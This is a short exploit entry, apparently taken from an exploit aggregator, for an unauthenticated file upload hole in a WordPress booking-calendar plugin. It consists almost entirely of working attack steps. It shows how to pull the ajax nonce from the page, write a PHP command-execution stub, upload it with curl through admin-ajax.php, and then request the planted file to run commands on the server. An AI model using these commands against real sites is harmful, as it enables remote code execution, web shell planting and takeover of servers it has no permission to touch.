## https://sploitus.com/exploit?id=WPEX-ID:4D91F3E1-4DE9-46C1-B5BA-CC55B7726867
1. As an unauthenticated user, navigate to the main WordPress page
2. Extract a valid nonce from the page source (CTRL+F for "var wpdevart =", field "ajaxNonce")
3. Prepare a payload for upload:
echo '<?php passthru("id"); ?>' > /tmp/poc.php
4. Upload the payload with cURL, with the previously extracted nonce:
curl -i https://example.com/wp-admin/admin-ajax.php \
-F 'action=wpdevart_form_ajax' \
-F 'wpdevart_id=x' \
-F 'wpdevart_nonce=<NONCE HERE>' \
-F 'wpdevart_data={"wpdevart-submit":"X"}' \
-F 'wpdevart-submit=1' \
-F 'file=@/tmp/poc.php'
5. Access your payload, it should have been uploaded to "/wp-content/uploads/booking_calendar/<filename>"
curl -i https://example.com/wp-content/uploads/booking_calendar/poc.php